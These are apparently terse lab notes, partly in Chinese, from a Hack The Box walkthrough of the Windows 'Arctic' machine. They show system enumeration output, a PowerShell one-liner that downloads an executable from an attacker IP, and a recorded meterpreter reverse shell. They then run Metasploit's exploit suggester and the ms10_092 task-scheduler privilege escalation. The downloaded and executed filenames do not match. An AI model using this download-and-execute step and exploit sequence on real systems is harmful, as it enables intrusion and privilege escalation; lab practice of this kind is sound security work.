》whoami arctic\tolis 》systeminfo Host Name:ARCTIC OS Name:MicrosoftWindowsServer2008 R2Standard OS Version:6.1.7600N/ABuild7600 OS Manufacturer:MicrosoftCorporation OS Configuration:StandaloneServer OS Build Type:MultiprocessorFree Registered Owner:WindowsUser Registered Organization: Product ID:55041-507-9857321-84451 Original Install Date:22/3/2017,11:09:45�� System Boot Time:31/1/2019,7:52:38�� System Manufacturer:VMware,Inc. System Model:VMwareVirtualPlatform System Type:x64-basedPC Processor(s):2Processor(s)Installed. [01]:Intel64Family6Model79Stepping1GenuineIntel~2400Mhz [02]:Intel64Family6Model79Stepping1GenuineIntel~2400Mhz BIOS Version:PhoenixTechnologiesLTD6.00,5/4/2016 Windows Directory:C:\Windows System Directory:C:\Windows\system32 Boot Device:\Device\HarddiskVolume1 System Locale:el;Greek Input Locale:en-us;English(UnitedStates) Time Zone:(UTC+02:00)Athens,Bucharest,Istanbul Total Physical Memory:1.024MB Available Physical Memory:241MB Virtual Memory: Max Size:2.048MB Virtual Memory: Available:1.209MB Virtual Memory: In Use:839MB PageFileLocation(s):C:\pagefile.sys Domain:HTB Logon Server:N/A Hotfix(s):N/A NetworkCard(s):1NIC(s)Installed. [01]:Intel(R)PRO/1000MTNetworkConnection Connection Name:LocalAreaConnection DHCP Enabled:No IPaddress(es) [01]:10.10.10.11
cd C:\Users\tolis\Desktop powershell "(new-object System.Net.WebClient).Downloadfile('http://10.10.14.7/m.exe', 'm.exe')" start p.exe 成功反弹metepreter
[+] 10.10.10.11 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable. [+] 10.10.10.11 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable. [+] 10.10.10.11 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
use exploit/windows/local/ms10_092_schelevator setSESSION1 set LHOST xxxx run